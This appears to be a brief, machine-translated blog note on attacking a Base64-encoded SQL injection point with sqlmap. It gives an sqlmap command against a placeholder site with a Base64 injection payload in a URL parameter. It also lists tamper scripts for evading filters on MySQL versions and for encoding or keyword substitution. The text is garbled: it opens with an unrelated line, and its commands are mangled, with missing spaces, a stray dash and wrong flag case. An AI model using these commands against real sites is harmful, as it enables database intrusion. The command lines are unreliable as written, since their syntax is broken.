Accidentally deleted, looking for a snapshot to find. Back up ...
The last encounter a Base64 injection point, manual injection too much trouble, so on the internet to see the Sqlmap Base64 injection method, as follows:
Sqlmap-u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5--tamper Base64encode.py–dbs
Sqlmap has a very powerful plug-in, plug-in use:--tamper "plugin name"
One of the commonly used bypass scripts bypasses Sqlmap main two scripts:
space2hash.py, for MySQL database 4.0, 5.0 injection
space2morehash.py, for MySQL database >= 5.1.13 and MySQL 5.1.41 injection
First determine the target database version and then select the appropriate script.
-V 3--batch--tamper "space2hash.py"
There are some other plugins:
Encodes encoding--charencode.py
Base64 encoding--base64encode.py
Replacing spaces and keywords--halfversionedmorekeywords.py